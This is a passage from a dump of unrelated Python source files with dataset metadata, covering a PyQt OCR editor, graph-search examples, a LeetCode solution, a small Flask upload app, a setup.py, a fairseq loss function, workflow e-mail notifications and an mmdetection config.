Do you want to save now?\")\n msgBox.setWindowTitle(\"Not Saved Warning\")\n msgBox.setStandardButtons(qtw.QMessageBox.Yes | qtw.QMessageBox.No | qtw.QMessageBox.Cancel)\n returnValue = msgBox.exec()\n return returnValue\n\n\n\n#####################\n# SLOTS #\n#####################\n\n def saveCurrentPreviews(self, new):\n if not new:\n self.curPagePreviews[self.curPage-1]=[self.window2.textEdit_Preview_1.toHtml(), self.window2.textEdit_Preview_2.toHtml()\n , self.window2.textEdit_Preview_3.toHtml(), self.window2.textEdit_Preview_4.toHtml()]\n else:\n self.curPagePreviews[self.curPage-1][1]=self.window2.textEdit_Preview_2.toHtml()\n self.curPagePreviews[self.curPage-1][2]=self.window2.textEdit_Preview_3.toHtml()\n self.curPagePreviews[self.curPage-1][3]=self.window2.textEdit_Preview_4.toHtml()\n\n\n def main_Changed(self):\n self.mainChanged = True\n\n def preview_Changed(self):\n self.mainChanged = False\n\n def cut_clicked(self):\n self.textEdit_Main.cut()\n \n def copy_clicked(self):\n self.textEdit_Main.copy()\n \n def paste_clicked(self):\n self.textEdit_Main.paste()\n\n def undo_clicked(self):\n self.textEdit_Main.undo()\n\n def redo_clicked(self):\n self.textEdit_Main.redo()\n\n def bold_toggled(self):\n if self.actionBold.isChecked():\n self.textEdit_Main.setFontWeight(qtg.QFont.Bold)\n else:\n self.textEdit_Main.setFontWeight(qtg.QFont.Normal)\n\n def italic_toggled(self):\n self.textEdit_Main.setFontItalic(self.actionItalic.isChecked())\n\n def underline_toggled(self):\n self.textEdit_Main.setFontUnderline(self.actionUnderline.isChecked())\n\n def select_all_clicked(self):\n self.textEdit_Main.selectAll()\n\n def block_signals(self, objects, b):\n for o in objects:\n o.blockSignals(b)\n\n def update_format(self):\n \"\"\"\n Update the font format toolbar/actions when a new text selection is made. This is neccessary to keep\n toolbars/etc. 
in sync with the current edit state.\n :return:\n \"\"\"\n # Disable signals for all format widgets, so changing values here does not trigger further formatting.\n self.block_signals(self._format_actions, True)\n\n # self.fonts.setCurrentFont(self.editor.currentFont())\n # # Nasty, but we get the font-size as a float but want it was an int\n # self.fontsize.setCurrentText(str(int(self.editor.fontPointSize())))\n self.actionItalic.setChecked(self.textEdit_Main.fontItalic())\n self.actionUnderline.setChecked(self.textEdit_Main.fontUnderline())\n self.actionBold.setChecked(self.textEdit_Main.fontWeight() == qtg.QFont.Bold)\n\n # self.alignl_action.setChecked(self.editor.alignment() == Qt.AlignLeft)\n # self.alignc_action.setChecked(self.editor.alignment() == Qt.AlignCenter)\n # self.alignr_action.setChecked(self.editor.alignment() == Qt.AlignRight)\n # self.alignj_action.setChecked(self.editor.alignment() == Qt.AlignJustify)\n\n self.block_signals(self._format_actions, False)\n\n \n def OCR_Page_selected(self):\n if self.curImg.size == 0:\n return\n self.waiting = Waiting()\n self.waiting.show()\n self.setEnabled(False)\n self.window2.setEnabled(False)\n qtw.QApplication.processEvents()\n worker = Worker(self.tesseractPage, self.curImg)\n worker.start()\n self.progress = 0\n high =0\n while self.progress<1.1:\n time.sleep (0.0000000000005)\n if self.progress > high:\n high = self.progress\n self.waiting.progressBar.setValue(int(self.progress*100))\n qtw.QApplication.processEvents()\n self.setEnabled(True)\n self.window2.setEnabled(True)\n self.window2.textEdit_Preview_2.setText(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setText(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setText(self.curPagePreviews[self.curPage-1][3])\n self.window2.textEdit_Preview_1.setText(self.curPagePreviews[self.curPage-1][0])\n self.window2.show()\n self.window2.activateWindow()\n\n self.waiting.close()\n\n def attributions_selected(self):\n qtw.QMessageBox.information(self, \"MFMC OCR\"\n , \"Icons by VisualPharm; http://creativecommons.org/licenses/by-nd/3.0/ web page\")\n\n def update_spinBox_Rotate(self, newAngle = 0):\n while newAngle < 0:\n newAngle += 360\n newAngle = newAngle % 360\n self.spinBox_Rotate.setValue(newAngle)\n self.curAngle = newAngle\n self.curImg = imutils.rotate_bound(self.curStraightImg, self.curAngle)\n self.showImg(self.curImg)\n\n def CW90_clicked(self):\n self.update_spinBox_Rotate(self.curAngle+90)\n\n def CCW90_clicked(self):\n self.update_spinBox_Rotate(self.curAngle-90)\n\n def R180_clicked(self):\n self.update_spinBox_Rotate(self.curAngle+180)\n\n def rotate(self):\n angle = self.spinBox_Rotate.value()\n self.update_spinBox_Rotate(angle)\n\n def changePage(self):\n if self.spinBox_Page.value() == self.curPage:\n return\n if self.spinBox_Page.value() > self.numPages:\n self.spinBox_Page.setValue(self.numPages)\n elif self.spinBox_Page.value() < 1:\n self.spinBox_Page.setValue(1)\n self.setPage(self.spinBox_Page.value())\n\n self.update_spinBox_Rotate (self.curAngle)\n\n self.window2.textEdit_Preview_1.setHtml(self.curPagePreviews[self.curPage-1][0])\n self.window2.textEdit_Preview_2.setHtml(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setHtml(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setHtml(self.curPagePreviews[self.curPage-1][3])\n\n\n def firstPage(self):\n self.spinBox_Page.setValue(1)\n \n def prevPage(self):\n if self.spinBox_Page.value() <= 1:\n 
self.spinBox_Page.setValue(1)\n return\n self.spinBox_Page.setValue(self.spinBox_Page.value() - 1)\n \n def nextPage(self):\n if self.spinBox_Page.value() >= self.numPages:\n self.spinBox_Page.setValue(self.numPages)\n return\n self.spinBox_Page.setValue(self.spinBox_Page.value() + 1)\n \n def lastPage(self):\n self.spinBox_Page.setValue(self.numPages)\n \n def keyPressEvent(self, e):\n if e.key() == qtc.Qt.Key_Escape:\n self.exit()\n\n def closeEvent(self,e):\n self.exit()\n\n def textChanged(self):\n self.saved = False\n\n\n##########################\n# PREVIEW WIDGET #\n##########################\n\n\nclass PreviewWindow(qtw.QMainWindow, Ui_MainWindowPreview):\n # Signals\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.setupUi(self)\n \n self.actionCut.triggered.connect (self.cut_clicked)\n self.actionCopy.triggered.connect (self.copy_clicked)\n self.actionPaste.triggered.connect (self.paste_clicked)\n self.actionUndo.triggered.connect (self.undo_clicked)\n self.actionRedo.triggered.connect (self.redo_clicked)\n\n self.pushButton_Clear_1.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_1.clicked.connect (self.ToClip_clicked)\n self.pushButton_Clear_2.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_2.clicked.connect (self.ToClip_clicked)\n self.pushButton_Clear_3.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_3.clicked.connect (self.ToClip_clicked)\n self.pushButton_Clear_4.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_4.clicked.connect (self.ToClip_clicked)\n\n\n #########################\n # SLOTS #\n #########################\n\n def cut_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.cut()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.cut()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.cut()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.cut()\n \n def copy_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.copy()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.copy()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.copy()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.copy()\n \n def paste_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.paste()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.paste()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.paste()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.paste()\n \n def undo_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.undo()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.undo()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.undo()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.undo()\n \n def redo_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.redo()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.redo()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.redo()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.redo()\n\n def Clear_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.clear()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.clear()\n elif self.tabWidget.currentIndex() == 2:\n 
self.textEdit_Preview_3.clear()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.clear()\n\n def ToClip_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.selectAll()\n self.textEdit_Preview_1.copy()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.selectAll()\n self.textEdit_Preview_2.copy()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.selectAll()\n self.textEdit_Preview_3.copy()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.selectAll()\n self.textEdit_Preview_4.copy()\n\n def closeEvent(self,e):\n self.setVisible = False\n\nclass Loading(qtw.QWidget, Ui_FormLoading):\n # Signals\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.setupUi(self)\n\nclass Waiting(qtw.QWidget, Ui_FormWaiting):\n # Signals\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.setupUi(self)\n\n\n \n\n\n#####################\n# MAIN #\n#####################\nif __name__ == '__main__':\n app = qtw.QApplication(sys.argv)\n window = MainWindow()\n \n \n sys.exit(app.exec_())\n ","sub_path":"mfmcOCR.py","file_name":"mfmcOCR.py","file_ext":"py","file_size_in_byte":25108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"295924659","text":"# breadth-first search - BFS\ngraph = {}\ngraph[\"you\"] = [\"alice\", \"bob\", \"claire\"]\ngraph[\"bob\"] = [\"anuj\", \"peggy\"]\ngraph[\"alice\"] = [\"peggy\"]\ngraph[\"claire\"] = [\"tom\", \"jhonny\"]\ngraph[\"anuj\"] = []\ngraph[\"peggy\"] = []\ngraph[\"tom\"] = []\ngraph[\"jhonny\"] = []\n\nfrom collections import deque\n\ndef person_is_seller(name):\n return name[-1] == 'm' #random way to decide who is a seller\n\ndef search(name):\n search_queue = deque()\n search_queue += graph[name]\n searched = []\n while search_queue:\n person = search_queue.popleft()\n if not person in searched:\n if person_is_seller(person):\n print(person + \" is a seller!\")\n return True\n else:\n search_queue += graph[person]\n searched.append(person)\n return False\n\nsearch(\"you\")\n\n\n\n# dijkstra algorithm (only works with positive weights)\n\ngraph = {}\ngraph[\"start\"] = {}\ngraph[\"start\"][\"a\"] = 6\ngraph[\"start\"][\"b\"] = 2\n\n# neighbors\nprint(graph[\"start\"].keys())\n\n# weight of the edges from both neighbors\nprint(graph[\"start\"][\"a\"])\nprint(graph[\"start\"][\"b\"])\n\n# add rest of nodes and neighbors to the graph\ngraph[\"a\"] = {}\ngraph[\"a\"][\"fin\"] = 1\n\ngraph[\"b\"] = {}\ngraph[\"b\"][\"a\"] = 3\ngraph[\"b\"][\"fin\"] = 5\n\ngraph[\"fin\"] = {}\n\ninfinity = float(\"inf\")\ncosts = {}\ncosts[\"a\"] = 6\ncosts[\"b\"] = 2\ncosts[\"fin\"] = infinity\n\nparents = {}\nparents[\"a\"] = \"start\"\nparents[\"b\"] = \"start\"\nparents[\"fin\"] = None\n\nprocessed = []\n\n\ndef find_lowest_cost_node(costs):\n lowest_cost = infinity\n lowest_cost_node = None\n for node in costs:\n cost = costs[node]\n if cost < lowest_cost and node not in processed:\n lowest_cost = cost\n lowest_cost_node = node\n return lowest_cost_node\n\n\nnode = find_lowest_cost_node(costs)\nwhile node is not None:\n cost = costs[node]\n neighbors = graph[node]\n for n in neighbors.keys():\n new_cost = cost + neighbors[n]\n if costs[n] > new_cost:\n costs[n] = new_cost\n parents[n] = node\n processed.append(node)\n node = 
find_lowest_cost_node(costs)\n\nprint(costs)","sub_path":"data_structures/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307629217","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n401. Binary Watch\n\nA binary watch has 4 LEDs on the top which represent the hours (0-11),\nand the 6 LEDs on the bottom represent the minutes (0-59).\nEach LED represents a zero or one, with the least significant bit on the right.\nFor example, the above binary watch reads \"3:25\".\nGiven a non-negative integer n which represents the number of LEDs that are currently on,\nreturn all possible times the watch could represent.\n\nExample:\n Input: n = 1\n Return: [\"1:00\", \"2:00\", \"4:00\", \"8:00\", \"0:01\", \"0:02\", \"0:04\", \"0:08\", \"0:16\", \"0:32\"]\n\nNote:\n The order of output does not matter.\n The hour must not contain a leading zero, for example \"01:00\" is not valid, it should be \"1:00\".\n The minute must be consist of two digits and may contain a leading zero,\n for example \"10:2\" is not valid, it should be \"10:02\".\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n@author: houxue\n@date: 2016/12/11\n\"\"\"\n\n\ndef count_bit(num):\n cnt = 0\n while num:\n num &= num - 1\n cnt += 1\n return cnt\n\n\nclass Solution(object):\n def readBinaryWatch(self, num):\n \"\"\"\n :type num: int\n :rtype: List[str]\n \"\"\"\n res = []\n for h in range(12):\n for m in range(60):\n if (bin(h)+bin(m)).count('1') == num:\n res.append('{}:{:0>2}'.format(h, m))\n\n return res\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.readBinaryWatch(1))\n","sub_path":"python/bit-manipulation/binary-watch.py","file_name":"binary-watch.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"14032878","text":"from flask import Flask\nfrom flask.ext.cors import CORS, cross_origin\nfrom flask import jsonify\nfrom flask import request\nimport json\nimport os\nimport binascii\nimport cv2\n\n\napp = Flask(__name__)\nUPLOAD_FOLDER = os.path.basename('uploads')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'application/json'\n\n@app.route('/translate',methods = ['post'])\ndef hello():\n print(request.get_data())\n return jsonify(\"MeFFTUFCUJGYucoup\")\n\n\n@app.route('/upload',methods = ['post'])\ndef ocr():\n print(request.get_data())\n print(request.files)\n file = request.files['myFile']\n print(file)\n f = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)\n file.save(f)\n \n return jsonify(\"Merci beaucoup\")\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', threaded=False)\n #app.run()\n","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"250907833","text":"#!/usr/bin/env python\nimport os\nimport re\n\nfrom setuptools import setup, find_packages\n\nversion_re = r'^__version__ = [\"\\']([^\"\\']*)[\"\\']$'\nauthor_re = r'^__author__ = [\"\\'](.*)[\"\\']$'\n\nINIT = open(os.path.join('gpucrate', '__init__.py')).read()\nversion = re.search(version_re, INIT, re.M).group(1)\nauthor = re.search(author_re, INIT, re.M).group(1)\n\nREADME = open('README.md').read()\n\nsetup(\n name='gpucrate',\n version=version,\n packages=find_packages(),\n 
author=author,\n url=\"https://github.com/jtriley/gpucrate\",\n description=(\"gpucrate creates hard-linked GPU driver volumes \"\n \"for use with docker, singularity, etc.\"),\n long_description=README,\n install_requires=[\n \"sh>=1.11\",\n \"nvidia-ml-py>=7.352.0\",\n \"PyYAML>=3.11\",\n ],\n setup_requires=[\n 'pytest-runner>=2.9'\n ],\n tests_require=[\n \"pytest>=3.0.3\",\n \"pytest-cov>=2.4.0\",\n \"pytest-flake8>=0.7\",\n \"testfixtures>=4.10.0\",\n \"mock>=2.0.0\",\n ],\n entry_points=dict(console_scripts=[\n 'gpucrate = gpucrate.cli:main',\n 'singularity-gpu = gpucrate.cli:singularity_gpu',\n ]),\n include_package_data=True,\n package_data={\n 'gpucrate.tests': ['data/*.txt'],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"205632006","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport math\n\nimport torch\nimport torch.nn.functional as F\n\nfrom fairseq import utils\n\nfrom fairseq.criterions import FairseqCriterion, register_criterion \n\n@register_criterion('ngram_language_loss')\nclass NgramLmLoss(FairseqCriterion):\n \"\"\"\n Implementation for the loss used in masked language model (MLM) training.\n \"\"\"\n\n def __init__(self, args, task):\n super().__init__(args, task)\n self.eps = args.label_smoothing\n self.disable_ngram_loss = args.disable_ngram_loss\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add criterion-specific arguments to the parser.\"\"\"\n # fmt: off\n parser.add_argument('--label-smoothing', default=0., type=float, metavar='D',\n help='epsilon for label smoothing, 0 means no label smoothing')\n parser.add_argument('--disable-ngram-loss', action='store_true',\n help='only comput basic stat')\n # fmt: on\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n # compute MLM loss\n logits_list = model(**sample['net_input'], return_all_hiddens=False)[0]\n targets = model.get_targets(sample, [logits_list[0]])\n\n\n ngram = len(logits_list)\n # [B, ngram, T]\n expend_targets = targets.new_zeros(ngram, targets.size(0), targets.size(1)).fill_(self.padding_idx)\n for i in range(ngram):\n if i > 0 and self.disable_ngram_loss:\n break\n\n padding_targets = torch.zeros_like(targets).fill_(self.padding_idx)\n if 'target_idx' in sample:\n expend_targets[i,:,:] = torch.where(sample['target_idx'] >= i, targets, padding_targets)\n else:\n expend_targets[i,:,:] = targets\n targets = expend_targets\n\n logits = torch.cat(logits_list, dim=0) #.view(ngram, *logits_list[0].size())\n\n lprobs = F.log_softmax(\n logits.view(-1, logits.size(-1)),\n dim=-1,\n dtype=torch.float32,\n )\n\n loss = F.nll_loss(\n lprobs,\n targets.view(-1),\n reduction='sum',\n ignore_index=self.padding_idx,\n )\n\n if self.eps > 0.:\n smooth_loss = -lprobs.sum(dim=-1, keepdim=True)\n non_pad_mask = targets.ne(self.padding_idx).view(-1)\n smooth_loss = smooth_loss[non_pad_mask]\n smooth_loss = smooth_loss.sum()\n\n eps_i = self.eps / lprobs.size(-1)\n loss = (1. 
- self.eps) * loss + eps_i * smooth_loss\n\n sample_size = targets.ne(self.padding_idx).int().sum().item()\n\n logging_output = {\n 'loss': utils.item(loss.data) if reduce else loss.data,\n 'ntokens': sample['ntokens'],\n 'nsentences': sample['nsentences'],\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n @staticmethod\n def aggregate_logging_outputs(logging_outputs):\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss = sum(log.get('loss', 0) for log in logging_outputs)\n ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n\n agg_output = {\n 'loss': loss / sample_size / math.log(2),\n 'ntokens': ntokens,\n 'nsentences': nsentences,\n 'sample_size': sample_size,\n }\n return agg_output\n","sub_path":"ProphetNet/ProphetNet_Dialog_Zh/prophetnet/ngram_criterions.py","file_name":"ngram_criterions.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"131541065","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\n\"\"\"\n异步通知处理器\n\"\"\"\nimport os, imp, json, re\nfrom common import db, conf, app\nfrom consts import *\nfrom core import *\nfrom db import *\nfrom interface import *\n\n\ndef getprocess_img(process_obj):\n formurl = conf.info.formurl % (process_obj.flow_id, process_obj.id)\n return get_pange_raw(formurl)\n\n\ndef getcnname(username):\n try:\n uinfo = OA.user_info({'username': username})\n return uinfo['cn_name']\n except BaseException as e:\n return username\n\n\n##审批或者驳回通知用户\n@Event.register(\"notice_user\")\ndef notice_user(pro_id, log_type, executor, msg):\n try:\n self = ZProcess.weakup(pro_id)\n _tm = {\n LOG_PROCESS_COMMIT: u\"审批\",\n LOG_PROCESS_REJECT: u\"驳回\",\n LOG_PROCESS_REMARK: u\"回复\"\n }\n process = self.wf_process\n\n node = self.load_node()\n node_name = node.name\n remind = 1\n title = u\"[工单系统:%s%s]\" % (_tm[log_type], process.process_name)\n phonemsg = u\"[%s工单][%s][%s]\" % (_tm[log_type], process.process_name, node_name)\n\n executorInfo = OA.user_info({'username': executor})\n if type(executorInfo) == dict:\n executorInfo = executorInfo.get('cn_name', executor)\n else:\n executorInfo = executor\n formurl = conf.info.formurl % (process.flow_id, process.id)\n html = u\"\"\"\n \n
当前流程步骤:%s\n                    执行人:%s\\n\n                    %s:%s\n                    时间:%s
\n \n \n \"\"\" % (node_name, executorInfo, _tm[log_type], msg, gettime())\n\n user_name = process.user_name\n process.remark = msg\n\n email = \"%s@example.com\" % user_name\n\n pngraw = get_pange_raw(formurl, {'id': process.id})\n\n feedback_mail = self.wf_process.feedback\n if feedback_mail:\n email = feedback_mail\n\n Mail.SendImages(email, title, html, [('form.png', pngraw)])\n self.logger(LOG_PROECSS_SEND_MAIL, executor, \"处理邮件回复\", b\"\\n\".join([title, html]))\n app.logger.info(\"Send mail for commit user.\\nuser mail title:%s\\nmail cut picture url:%s\" % (title, formurl))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_user\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##通知待处理人处理工单\n@Event.register(\"notice_executor\")\ndef notice_executor(pro_id):\n try:\n self = ZProcess.weakup(pro_id)\n process = self.wf_process\n node = self.load_node()\n remind = 1\n\n process_User_Info = OA.user_info({'username': process.user_name})\n title = u\"[你有新的工单]--%s--%s\" % (process.flow_name, process.process_name)\n try:\n post_cn_name = process_User_Info['cn_name']\n except BaseException as e:\n post_cn_name = process.user_name\n\n commit_url = conf.info.ucommit % process.id\n\n html = u\"\"\"\n \n
当前步骤:%s\n                    提交人:%s\n                    步骤开始时间:%s\n                    点击跳转到审批页面:%s
\n \n \n \"\"\" % (node.name, post_cn_name, str(process.update_time), commit_url)\n ulist = list(set(process.candidate.split(\",\")))\n maillist = \";\".join([\"%s@example.com\" % name for name in ulist])\n\n formurl = conf.info.formurl % (process.flow_id, process.id)\n pngraw = get_pange_raw(formurl, {'id': process.id})\n\n Mail.SendImages(maillist, title, html, [('form.png', pngraw)])\n self.logger(LOG_PROECSS_SEND_MAIL, \"system\", \"步骤邮件通知\", b\"\\n\".join([maillist, title, html]))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_executor\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##发送消息给审批人\n@Event.register(\"notice_sendmsg\")\ndef notice_sendmsg(pro_id, msg):\n try:\n self = ZProcess.weakup(pro_id)\n process = self.wf_process\n node = self.load_node()\n remind = 1\n\n process_User_Info = OA.user_info({'username': process.user_name})\n title = u\"[提单人消息]--%s--%s\" % (process.flow_name, process.process_name)\n try:\n post_cn_name = process_User_Info['cn_name']\n except BaseException as e:\n post_cn_name = process.user_name\n\n commit_url = conf.info.ucommit % process.id\n\n html = u\"\"\"\n \n
当前步骤:%s\n                    发送消息给审批人:%s\n                    点击跳转到审批页面:%s
\n \n \n \"\"\" % (node.name, msg, commit_url)\n ulist = list(set(process.candidate.split(\",\")))\n maillist = \";\".join([\"%s@example.com\" % name for name in ulist])\n\n formurl = conf.info.formurl % (process.flow_id, process.id)\n pngraw = get_pange_raw(formurl, {'id': process.id})\n Mail.SendImages(maillist, title, html, [('form.png', pngraw)])\n\n # for recver in node.candidate():\n # if FLAG_SMS & remind:\n # SMS.Send(UserInfo['mobile'],phonemsg)\n # self.logger(LOG_PROECSS_SEND_MAIL,\"system\",\"步骤短信通知\",b\"\\n\".join([title,phonemsg]))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_executor\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##驳回通知\n@Event.register(\"notice_reject\")\ndef notice_reject(pro_id, executor, msg):\n try:\n self = ZProcess.weakup(pro_id)\n process = self.wf_process\n node = self.load_node()\n\n commit_name = getcnname(process.user_name)\n executor_name = getcnname(executor)\n\n title = u\"[工单驳回]--%s--%s\" % (process.flow_name, process.process_name)\n html = u\"\"\"\n \n
步骤:%s\n                    提单人:%s\n                    驳回人:%s\n                    回复:%s
\n \n \n \"\"\" % (node.name, commit_name, executor_name, msg)\n\n qlist = db.session.query(ProcessLog).filter_by(process_id=process.id, type=LOG_PROCESS_COMMIT).all()\n executor_list = [record.operation_user_ad for record in qlist]\n executor_list += [executor]\n\n maillist = [u\"%s@example.com\" % name for name in executor_list]\n maillist += [u\"%s@example.com\" % process.user_name]\n if process.feedback:\n flist = re.split(r\"[,;]\", process.feedback)\n maillist += [u\"%s\" % mail for mail in flist]\n\n maillist = [mail.strip() for mail in maillist]\n maillist = list(set(maillist))\n maillist = u\";\".join(maillist)\n\n pngraw = getprocess_img(process)\n\n Mail.SendImages(maillist, title, html, [('form.png', pngraw)])\n self.logger(LOG_PROECSS_SEND_MAIL, \"system\", u\"驳回通知\", b\"\\n\".join([maillist, title, html]))\n app.logger.info(\"notice_reject title %s maillist %s\" % (title, maillist))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_executor\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##发送简单邮件\n@Event.register(\"notice_mail\")\ndef NoticeDev(to, title, content):\n Mail.Send(to, title, content)\n app.logger.info(\"send notice_mail %s\" % to)\n","sub_path":"server/observer/async_notice.py","file_name":"async_notice.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"167643982","text":"model = dict(\n type='ATSS',\n backbone=dict(\n type='SwinTransformer',\n embed_dims=192,\n depths=[2, 2, 18, 2],\n num_heads=[6, 12, 24, 48],\n window_size=7,\n mlp_ratio=4,\n qkv_bias=True,\n qk_scale=None,\n drop_rate=0.0,\n attn_drop_rate=0.0,\n drop_path_rate=0.2,\n patch_norm=True,\n out_indices=(0, 1, 2, 3),\n with_cp=False,\n convert_weights=True,\n init_cfg=dict(\n type='Pretrained',\n checkpoint=\n 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth'\n )),\n neck=dict(\n type='FPN',\n in_channels=[192, 384, 768, 1536],\n out_channels=256,\n start_level=1,\n add_extra_convs='on_output',\n num_outs=5),\n bbox_head=dict(\n type='ATSSHead',\n num_classes=4,\n in_channels=256,\n stacked_convs=4,\n feat_channels=256,\n anchor_generator=dict(\n type='AnchorGenerator',\n ratios=[1.0],\n octave_base_scale=8,\n scales_per_octave=1,\n strides=[8, 16, 32, 64, 128]),\n bbox_coder=dict(\n type='DeltaXYWHBBoxCoder',\n target_means=[0.0, 0.0, 0.0, 0.0],\n target_stds=[0.1, 0.1, 0.2, 0.2]),\n loss_cls=dict(\n type='FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n loss_bbox=dict(type='GIoULoss', loss_weight=2.0),\n loss_centerness=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0)),\n train_cfg=dict(\n assigner=dict(type='ATSSAssigner', topk=9),\n allowed_border=-1,\n pos_weight=-1,\n debug=False),\n test_cfg=dict(\n nms_pre=1000,\n min_bbox_size=0,\n score_thr=0.05,\n nms=dict(type='nms', iou_threshold=0.6),\n max_per_img=100))\ndataset_type = 'CocoDataset'\ndata_root = '../data_coco/'\nclasses = ('01_ulcer', '02_mass', '04_lymph', '05_bleeding')\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='Resize',\n img_scale=[(512, 461), (512, 563)],\n multiscale_mode='range',\n keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='Normalize',\n 
